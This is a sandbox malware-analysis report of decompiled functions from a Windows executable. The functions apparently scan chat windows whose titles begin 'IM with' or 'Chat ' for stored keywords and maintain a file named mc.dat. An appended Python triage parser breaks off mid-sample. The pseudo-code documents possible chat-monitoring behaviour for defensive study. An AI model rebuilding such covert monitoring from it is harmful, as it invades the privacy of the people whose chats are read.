    							 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
    							L0043DD36();
    							 *((intOrPtr*)(_t89 - 0x10)) =  *((intOrPtr*)(_t89 - 0x10)) + 1;
    						} while ( *((intOrPtr*)(_t89 - 0x10)) <  *(_t89 - 0x18));
    					}
    					_push("mc.dat");
    					_t51 = _t89 - 0x18;
    					_push(0x4558c8);
    					_push(_t51);
    					L0043DE20();
    					_push( *_t51);
    					 *(_t89 - 4) = 1;
    					_t52 = E0042860B( *((intOrPtr*)(_t87 + 0x60)));
    					 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
    					L0043DD36();
    					_push(0x47a);
    					L0043E066();
    					_t53 = SendMessageA( *(_t52 + 0x20), 0x147, 0, 0);
    					_push(0x421);
    					 *( *(_t87 + 0x64) + 0x358) = _t53;
    					L0043DFA6();
    					if(_t53 != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x60)) + 0x4b0)) != 0) {
    						_push(1);
    						_pop(0);
    					}
    					_t54 =  *(_t87 + 0x64);
    					_push(0x48d);
    					 *((char*)(_t54 + 0x13b)) = 0;
    					L0043DFA6();
    					_push(0x48e);
    					_t55 = _t54 & 0xffffff00 | _t54 != 0x00000000;
    					 *( *(_t87 + 0x64) + 0x148) = _t55;
    					L0043DFA6();
    					_push(0x48f);
    					_t56 = _t55 & 0xffffff00 | _t55 != 0x00000000;
    					 *( *(_t87 + 0x64) + 0x149) = _t56;
    					L0043DFA6();
    					_t47 = _t56 & 0xffffff00 | _t56 != 0x00000000;
    					 *( *(_t87 + 0x64) + 0x14a) = _t47;
    					L0043E03C();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
    				return _t47;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040EDF4
    • #6334.MFC42(00000001), ref: 0040EE01
      • Part of subcall function 004285DB: #825.MFC42(?,?,?,?,0040EE27,?,?,00000001), ref: 004285EE
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040EE3C
    • #3301.MFC42(00000001,?,00000000,?,?,00000001), ref: 0040EE56
      • Part of subcall function 00428515: lstrlenA.KERNEL32(00000001), ref: 00428528
      • Part of subcall function 00428515: #823.MFC42(00000001), ref: 00428530
      • Part of subcall function 00428515: lstrcpyA.KERNEL32(?,00000001), ref: 0042854C
    • #800.MFC42(00000000,00000001,?,00000000,?,?,00000001), ref: 0040EE6F
    • #924.MFC42(?,004558C8,mc.dat,?,?,00000001), ref: 0040EE8D
    • #800.MFC42(00000000,?,004558C8,mc.dat,?,?,00000001), ref: 0040EEAA
    • #3092.MFC42(0000047A,00000000,?,004558C8,mc.dat,?,?,00000001), ref: 0040EEB6
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040EEC5
    • #4055.MFC42(00000421,?,?,00000001), ref: 0040EED7
    • #4055.MFC42(0000048D,00000421,?,?,00000001), ref: 0040EEFE
    • #4055.MFC42(0000048E,0000048D,00000421,?,?,00000001), ref: 0040EF18
    • #4055.MFC42(0000048F,0000048E,0000048D,00000421,?,?,00000001), ref: 0040EF32
    • #4853.MFC42(0000048F,0000048E,0000048D,00000421,?,?,00000001), ref: 0040EF47
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4055$#800MessageSend$#3092#3301#4853#6334#823#825#924H_prologlstrcpylstrlen
    • String ID: mc.dat
    • API String ID: 3471012821-4287095944
    • Opcode ID: adc1f95d8fcd1b8b7c74dc06287ab74d92a0c8d46913fc414a3effc011fee3e4
    • Instruction ID: e701eaf865acadef7edbecf5bf54880852a9a1e5a9996fc064e93e69b1f6b00f
    • Opcode Fuzzy Hash: adc1f95d8fcd1b8b7c74dc06287ab74d92a0c8d46913fc414a3effc011fee3e4
    • Instruction Fuzzy Hash: 7E41B1716007059FD714EF66C982AEEB7B5BF48704F04086EF246AB2E2DB789D01CB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0042860B(intOrPtr* __ecx) {
    				void* _t45;
    				CHAR* _t48;
    				intOrPtr* _t53;
    				intOrPtr* _t70;
    				void* _t75;
    
    				E0043E4E0(0x442f14, _t75);
    				_t70 = __ecx;
    				DeleteFileA( *(_t75 + 8));
    				if( *((intOrPtr*)(_t70 + 0x4b0)) != 0) {
    					L0043E486();
    					 *(_t75 - 4) = 0;
    					L0043DDDE();
    					 *(_t75 - 4) = 1;
    					L0043DDD8();
    					 *(_t75 - 0x14) =  *(_t75 - 0x14) | 0xffffffff;
    					_push(0);
    					 *(_t75 - 4) = 2;
    					 *((intOrPtr*)(_t75 - 0x20)) = 0x445490;
    					 *((intOrPtr*)(_t75 - 0x18)) = 0;
    					L0043DDD2();
    					_t45 = _t75 - 0x20;
    					_push(_t45);
    					_push(0x1001);
    					_push( *(_t75 + 8));
    					 *(_t75 - 4) = 3;
    					L0043E480();
    					if(_t45 != 0) {
    						 *(_t75 + 8) = 0;
    						if( *((intOrPtr*)(_t70 + 0x4b0)) > 0) {
    							_t53 = _t70;
    							do {
    								_push( *_t53);
    								L0043E4B0();
    								_push(0x4532cc);
    								L0043E4B0();
    								 *(_t75 + 8) =  &(( *(_t75 + 8))[1]);
    								_t53 = _t53 + 4;
    							} while ( *(_t75 + 8) <  *((intOrPtr*)(_t70 + 0x4b0)));
    						}
    						L0043E474();
    						_push(_t75 + 8);
    						L0043E276();
    						 *(_t75 - 4) = 5;
    						E0042AAFA( *(_t75 + 8));
    						 *(_t75 - 4) = 3;
    						L0043DD36();
    						 *((intOrPtr*)(_t75 - 0x20)) = 0x445490;
    						_push(1);
    						 *(_t75 - 4) = 6;
    						_pop(0);
    					} else {
    						 *((intOrPtr*)(_t75 - 0x20)) = 0x445490;
    						 *(_t75 - 4) = 4;
    					}
    					L0043DD36();
    					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
    					 *((intOrPtr*)(_t75 - 0x20)) = 0x44547c;
    					L0043E46E();
    					_t48 = 0;
    				} else {
    					_t48 = 1;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
    				return _t48;
    			}








    Instruction addresses (per-line address column of the decompiler view, condensed): 0x00428610 to 0x0042872e

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #350#5194#533#540#798#800#860DeleteFileH_prolog
    • String ID: |TD
    • API String ID: 3286372685-231495167
    • Opcode ID: c060ffc11bb77793de18164d3a9fd0bd52928181958fd8a8f41bc6fc7aee918b
    • Instruction ID: a7d5b4dd1822b50172ccdf9581838aa126aadad513d89915bc5e5d349a4f8513
    • Opcode Fuzzy Hash: c060ffc11bb77793de18164d3a9fd0bd52928181958fd8a8f41bc6fc7aee918b
    • Instruction Fuzzy Hash: 7431BE30902259EEDF14EFA5D981ADDBB70BF28308F60451EF402662C2DB785B44CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040B2B5(void* __ecx) {
    				char _t30;
    				char** _t35;
    				char** _t37;
    				void* _t61;
    
    				E0043E4E0(0x43fc78, _t61);
    				if(IsWindow( *(_t61 + 8)) == 0 || strcmp( *(_t61 + 0xc), "__oxFrame.class__") != 0 || E0040FF68( *(_t61 + 8), 0, "__oxFrame.class__", 0, "Internet Explorer_Server", 0) == 0) {
    					L9:
    					_t30 = 0;
    				} else {
    					_push( *(_t61 + 8));
    					_push(_t61 + 0xc);
    					E0040FEA7();
    					_t35 = _t61 - 0x14;
    					_push(8);
    					_push(_t35);
    					 *(_t61 - 4) = 0;
    					L0043DFD0();
    					 *(_t61 - 4) = 1;
    					if(strcmp( *_t35, "IM with ") == 0) {
    						L5:
    						 *((char*)(_t61 + 0xb)) = 1;
    					} else {
    						_t37 = _t61 - 0x10;
    						_push(5);
    						_push(_t37);
    						L0043DFD0();
    						 *((char*)(_t61 + 0xb)) = strcmp( *_t37, "Chat ") == 0;
    						L0043DD36();
    						 *((char*)(_t61 + 0xb)) = 0;
    						if( *((intOrPtr*)(_t61 + 0xb)) != 0) {
    							goto L5;
    						}
    					}
    					 *(_t61 - 4) = 0;
    					L0043DD36();
    					if( *((intOrPtr*)(_t61 + 0xb)) == 0) {
    						 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
    						L0043DD36();
    						goto L9;
    					} else {
    						 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
    						L0043DD36();
    						_t30 = 1;
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
    				return _t30;
    			}







    Instruction addresses (per-line address column of the decompiler view, condensed): 0x0040b2ba to 0x0040b3b0

    APIs
    • __EH_prolog.LIBCMT ref: 0040B2BA
    • IsWindow.USER32(?), ref: 0040B2C6
    • strcmp.MSVCRT ref: 0040B2DD
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #4129.MFC42(?,00000008), ref: 0040B324
    • strcmp.MSVCRT ref: 0040B334
    • #4129.MFC42(?,00000005,?,00000008), ref: 0040B348
    • strcmp.MSVCRT ref: 0040B354
    • #800.MFC42(?,?,00000005,?,00000008), ref: 0040B364
    • #800.MFC42(?,00000008), ref: 0040B37B
    • #800.MFC42(?,00000008), ref: 0040B38C
    • #800.MFC42(?,00000008), ref: 0040B39C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$Window$strcmp$#4129FindH_prologMessageSend$#535#537#823#825memset
    • String ID: Chat $IM with $Internet Explorer_Server$__oxFrame.class__
    • API String ID: 1234111086-110528233
    • Opcode ID: d57322620cefddb25537c271ce285b9440a05bde8707165ba44593b374412d4b
    • Instruction ID: b08ac53a7dfa84f5ae855337021f5146d19fccb7cf4186faee3b8bc53d0731ac
    • Opcode Fuzzy Hash: d57322620cefddb25537c271ce285b9440a05bde8707165ba44593b374412d4b
    • Instruction Fuzzy Hash: A121B171801148BECF15DF61DC81ADE7B64EF16364F20816FF815661D1EB389B48D65C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0041C252(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}



    Instruction addresses (per-line address column of the decompiler view, condensed): 0x0041c252 to 0x0041c2ac

    APIs
    • #537.MFC42(None,0041C24D), ref: 0041C25C
    • #537.MFC42(User defined,None,0041C24D), ref: 0041C26B
    • #537.MFC42(Open,User defined,None,0041C24D), ref: 0041C27A
    • #537.MFC42(Print,Open,User defined,None,0041C24D), ref: 0041C289
    • #537.MFC42(Explore,Print,Open,User defined,None,0041C24D), ref: 0041C298
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041C24D), ref: 0041C2A7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined$WE$WE$WE
    • API String ID: 4256512136-2572353929
    • Opcode ID: 79a2b1d5260f91db78b2ce4fb80641d1ad0318c7dedf8a01b0791cac9b9acef3
    • Instruction ID: 930db563bb041013439e8ef62466512621752000733374109630c874ba7bf5c8
    • Opcode Fuzzy Hash: 79a2b1d5260f91db78b2ce4fb80641d1ad0318c7dedf8a01b0791cac9b9acef3
    • Instruction Fuzzy Hash: DED0AC04F40E41D64524BF66E43357D9946CB9C7C7F50A15FBD021E2D38D4C4A5C452D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040CD7D(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}



    Instruction addresses (per-line address column of the decompiler view, condensed): 0x0040cd7d to 0x0040cdd7

    APIs
    • #537.MFC42(None,0040CD78), ref: 0040CD87
    • #537.MFC42(User defined,None,0040CD78), ref: 0040CD96
    • #537.MFC42(Open,User defined,None,0040CD78), ref: 0040CDA5
    • #537.MFC42(Print,Open,User defined,None,0040CD78), ref: 0040CDB4
    • #537.MFC42(Explore,Print,Open,User defined,None,0040CD78), ref: 0040CDC3
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0040CD78), ref: 0040CDD2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: SE$$SE$(SE$E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-2345762246
    • Opcode ID: b8a559c35734eb45d14b4dfc9f20b6bf4b0adfd2e2b4e46f76fc9921699c5edc
    • Instruction ID: da5d5db970de4c682cb833db9293b34621f818dda07f35ad23db7220c8c188ac
    • Opcode Fuzzy Hash: b8a559c35734eb45d14b4dfc9f20b6bf4b0adfd2e2b4e46f76fc9921699c5edc
    • Instruction Fuzzy Hash: B5D0AC00F50E41D549147E65E43353D5842C79C7C7790A16F7D061E1D38DCC4A1C452D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00426DEC(void* __ecx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				CHAR* _t52;
    				CHAR* _t55;
    				void* _t70;
    				intOrPtr _t72;
    				void* _t80;
    				void* _t120;
    				void* _t122;
    				void* _t130;
    
    				_t52 = E0043E4E0(0x442c24, _t122);
    				_t120 = __ecx;
    				if( *((char*)(__ecx + 0x17f5)) != 0 ||  *((char*)(__ecx + 0x17f6)) != 0) {
    					if(( *0x4558e4 & 0x00000001) != 0) {
    						_t80 = 0x4558d0;
    					} else {
    						 *0x4558e4 =  *0x4558e4 | 0x00000001;
    						_t80 = 0x4558d0;
    						E0042835B(0x4558d0, 0, 1);
    						E0043E560(E00426FEC);
    					}
    					_t112 = _t120 + 0x78;
    					_t130 =  *0x455ae4 - E004208D3(_t120 + 0x78); // 0x0
    					if(_t130 != 0) {
    						E0042848B(_t80);
    						 *0x455ae4 = E004208D3(_t112);
    					}
    					L0043E45C();
    					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
    					_push(E004208CC(_t112));
    					L0043E48C();
    					_t52 =  *(_t122 - 0x24);
    					if(_t52 - 1 == 0xffffffff) {
    						L16:
    						 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
    						L0043E450();
    						goto L17;
    					} else {
    						_push(0);
    						_push(_t52);
    						L0043E462();
    						_t55 =  *(_t122 - 0x28);
    						 *(_t122 - 0x18) = _t55;
    						_t52 = CharLowerA(_t55);
    						 *(_t122 - 0x10) = 0;
    						if( *((intOrPtr*)(_t120 + 0x16b4)) <= 0) {
    							goto L16;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t115 = _t120 + 0x1204;
    							lstrcpyA(_t122 - 0x12c, E0042855C(_t120 + 0x1204,  *(_t122 - 0x10)));
    							CharLowerA(_t122 - 0x12c);
    							if(E004284C0(_t80, _t122 - 0x12c) == 0 && strstr( *(_t122 - 0x18), _t122 - 0x12c) != 0) {
    								E004283A6(_t80, _t122 - 0x12c);
    								if( *((char*)(_t120 + 0x17f6)) != 0) {
    									E004250CC(_t120, _t120);
    								}
    								if( *((char*)(_t120 + 0x17f5)) != 0) {
    									_push(_t120 + 0x16b8);
    									L0041E33B(_t120 + 0x16b8, _t120 + 0x276c, _t115, _t120);
    									_push(E0042855C(_t115,  *(_t122 - 0x10)));
    									L0043DDD2();
    									_t70 = E004208CC(_t120 + 0x78);
    									_t72 =  *((intOrPtr*)(E004208CC(_t120 + 0x78) + 4));
    									_push( *((intOrPtr*)(_t70 + 8)) - 1 + 1);
    									_push(_t72);
    									L0043DFDC();
    									_push(_t72);
    									 *(_t122 - 4) = 1;
    									L0043DFCA();
    									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
    									L0043DD36();
    									 *(_t120 + 0x37dc) =  *(_t120 + 0x37dc) & 0x00000000;
    									E00427544(_t120 + 0x276c);
    									_t80 = 0x4558d0;
    								}
    							}
    							 *(_t122 - 0x10) =  &(( *(_t122 - 0x10))[1]);
    							_t52 =  *(_t122 - 0x10);
    						} while (_t52 <  *((intOrPtr*)(_t120 + 0x16b4)));
    						goto L16;
    					}
    				} else {
    					L17:
    					 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
    					return _t52;
    				}
    			}














    Instruction addresses (per-line address column of the decompiler view, condensed): 0x00426df1 to 0x00426feb

    APIs
    • __EH_prolog.LIBCMT ref: 00426DF1
    • #287.MFC42 ref: 00426E71
    • #2060.MFC42(00000000), ref: 00426E85
    • #5857.MFC42(?,00000000,00000000), ref: 00426EA0
    • CharLowerA.USER32(?,?,00000000,00000000), ref: 00426EAC
    • lstrcpyA.KERNEL32(?,00000000,?), ref: 00426ED9
    • CharLowerA.USER32(?), ref: 00426EE6
    • strstr.MSVCRT ref: 00426F0C
    • #860.MFC42(00000000,?), ref: 00426F68
    • #538.MFC42(?,?,00000000,?), ref: 00426F8A
    • #858.MFC42(00000000,?,?,00000000,?), ref: 00426F9A
    • #800.MFC42(00000000,?,?,00000000,?), ref: 00426FA6
      • Part of subcall function 00427544: #1105.MFC42(00426FF6,?,00000000,00000000,00000000,00000000,00426FBA,?), ref: 0042755C
    • #610.MFC42(00000000), ref: 00426FD8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CharLower$#1105#2060#287#538#5857#610#800#858#860H_prologlstrcpystrstr
    • String ID: $,D
    • API String ID: 4199240607-2290473225
    • Opcode ID: 82f30584d9139ae9433c4961c659f99478d964eff8135e6374ef771c13bad6c4
    • Instruction ID: fcbf78a614c8e22cc27cbc8bea8d7621adb7ae57c6e2156843f2ebfafb0219d9
    • Opcode Fuzzy Hash: 82f30584d9139ae9433c4961c659f99478d964eff8135e6374ef771c13bad6c4
    • Instruction Fuzzy Hash: 09510370A016159BDF15EB71E895BEFB7B8EF48308F40042FE016A3192DB386E49CB58
    Uniqueness

    Uniqueness Score: -1.00%
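    The function records above all follow one layout: a "C-Code - Quality" header with the decompiled function, an APIs list whose "Part of subcall function" sub-bullets mark imports reached only through callees, and a Similarity section carrying the String ID and the Instruction Fuzzy Hash. For triage it is useful to pull those fields out of the dump as a whole, for example to list every function whose strings mention mc.dat or __oxFrame.class__, or to see which functions call a given import directly rather than through a helper. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample; it assumes the record layout exactly as it appears on this page, and its SAMPLE_REPORT is a constructed excerpt copied from two of the records above (E0040B2B5 and E0041C252) and trimmed to the lines the parser consumes.

```python
"""Parse the per-function records of a Joe Sandbox C-Code dump for triage.

Added example, not code from the Joe Sandbox report or the analysed sample.
Assumed layout (as seen on this page): 'C-Code - Quality: NN%' then
'E<addr>(...) {', an 'APIs' list of '• api.MODULE' bullets with
'• Part of subcall function <addr>: ...' sub-bullets, and a 'Similarity'
section carrying 'String ID' and 'Instruction Fuzzy Hash'.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed excerpt: lines copied from the E0040B2B5 and E0041C252 records.
SAMPLE_REPORT = """\
C-Code - Quality: 79%
            E0040B2B5(void* __ecx) {
            }
APIs
• __EH_prolog.LIBCMT ref: 0040B2BA
• IsWindow.USER32(?), ref: 0040B2C6
• strcmp.MSVCRT ref: 0040B2DD
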